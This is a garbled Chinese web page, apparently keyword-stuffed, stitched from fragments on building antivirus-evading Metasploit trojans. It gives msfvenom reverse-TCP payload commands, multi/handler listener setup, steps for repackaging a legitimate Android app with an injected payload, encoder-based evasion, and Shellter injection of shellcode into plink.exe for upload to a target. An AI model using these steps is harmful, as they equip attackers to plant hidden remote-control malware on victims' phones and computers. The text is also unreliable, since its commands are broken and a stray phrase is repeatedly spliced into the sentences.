使用命令注入payload python mainpy lhost youip lport youport n vxapk 填写公网IP与端口msfpayload免杀apK,本地映射至12700011145端口 生成注入成功msfpayload免杀apK的apk与监听脚本 远控Apk位于root520apkhookWorkDirAllFinishapk 监听脚本位于root520apkhookWorkDirhandlerrc 3下载并安装apk 4启动。
msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应msfpayload免杀apK你要监听的端口 然后生成木马的路径 这样我们就在root路径下生成msfpayload免杀apK了一个APK的安卓木马文件,至于木马的免杀暂且不谈现在我们在来启动MSF工具 输入命令msfconsole 然后输入1 use exploitmultihandler 加载。
MSF metasploithtml 平台仅供安全研究使用,禁止用于非法用途,服务条款见官网 WgpSec狼组安全团队服务条款生成的程序与shellcode都会自动删除,不会留下记录 一生成Shellcode 将生成的payloadc中的buf部分复制下来,也就是引号中的部分,请注意要复制全。
1 查找并获取生成的应用文件2 使用Apktool反编译应用,找到AndroidManifestxml文件3 通过msf生成的原始payload文件反编译,查看并复制声明的权限到当前应用中,确保不重复声明在完成权限声明后,使用Apktool打包应用并添加签名,确保应用在不同环境下的正常运行通过以下步骤进行应用打包与签名1。
首先,生成一个免杀的MSF木马,使用命令 msfvenom p windowsx64meterpreterreverse_tcp LHOST= LPORT=4444 f exe expexe,其中LHOST是msfpayload免杀apK你的vps地址,LPORT是监听端口接着,配置MSF监听端口,使用命令 use exploitmultihandler,设置payload为payload windowsx64meterpreter。
为了解决免杀问题,尝试使用msf自带编码器进行处理通过查看所有编码器,选择等级为excellent的x86shikata_ga_nai编码器进行测试修改payload命令后,生成了t2exe文件尽管尝试了特征码绕过和编码次数调整,payload仍然被查杀为提高免杀成功率,尝试将编码器与微软官方工具捆绑使用使用官方procdump工具。
当提示输入Payloads时选择“L”然后选择“1” Meterpreter_Reverse_TCP 之后输出攻击方ip,监听端口等等 Shellter将会在plinkexe中注入shellcode 这时我们发现跟原文件相比,root目录下的plinkexe文件变大了些,说明注入完成 之后启动msf我们把plinkexe上传到目标机 当我们用plink进行远程登录的时候,在。
使用图形化方式进入MSF,双击metasploit即可进入控制台,成功后命令行将显示“msf6 ”当前版本为v6030,集成有2099个攻击模块exploits1129个辅助模块auxiliary357个后渗透模块post592个攻击载荷模块payloads45个编码模块encoders10个无操作生成器nops7个免杀模块。
sfpayloadwindowsmeterpreterreverse_tcpLHOST=49xsteupexe方法步骤二黑客直接就能进入所在的目录并将属性进行修改,换为允许以程序执行文件,详细如下图进入所在目录,修改属性选择“允许以程序执行文件”,这时候也可以做一些免杀方法步骤三接着黑客就打开msfconsole并加载exploit。
发表评论